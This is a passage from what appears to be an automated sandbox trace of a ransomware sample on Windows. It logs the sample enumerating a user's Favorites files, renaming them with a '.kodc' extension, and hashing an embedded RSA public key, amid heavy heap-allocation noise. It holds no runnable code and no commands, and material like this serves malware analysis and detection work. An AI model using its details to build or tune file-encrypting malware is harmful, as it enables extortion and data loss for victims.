0x42c [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba84b8 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.685] GetCurrentThreadId () returned 0x42c [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.686] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.686] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.686] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.686] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.686] CloseHandle (hObject=0x5cc) returned 1 [0101.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x32c9230 [0101.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0101.688] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.kodc")) returned 1 [0101.689] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0101.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.689] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned=".url" [0101.690] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.690] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=133) returned 1 [0101.690] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.693] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.693] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.694] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x85, lpOverlapped=0x0) returned 1 [0101.694] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.694] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.694] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.694] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.695] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.695] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.695] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.695] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.695] GetLastError () returned 0x0 [0101.695] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.695] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.695] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.695] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.695] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.695] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.695] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.695] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb61f0 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80a0 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6238 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80b8 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80e8 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8100 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.696] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80e8 | out: hHeap=0x630000) returned 1 [0101.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8100 | out: hHeap=0x630000) returned 1 [0101.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8100 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb80e8 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8100 | out: hHeap=0x630000) returned 1 [0101.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80e8 | out: hHeap=0x630000) returned 1 [0101.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.697] GetCurrentThreadId () returned 0x42c [0101.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8548 [0101.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.697] GetCurrentThreadId () returned 0x42c [0101.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80e8 [0101.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0101.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8100 [0101.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80d0 [0101.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8118 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80e8 | out: hHeap=0x630000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb80e8 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80e8 | out: hHeap=0x630000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8118 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8100 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80d0 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb80b8 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb6238 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.700] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: 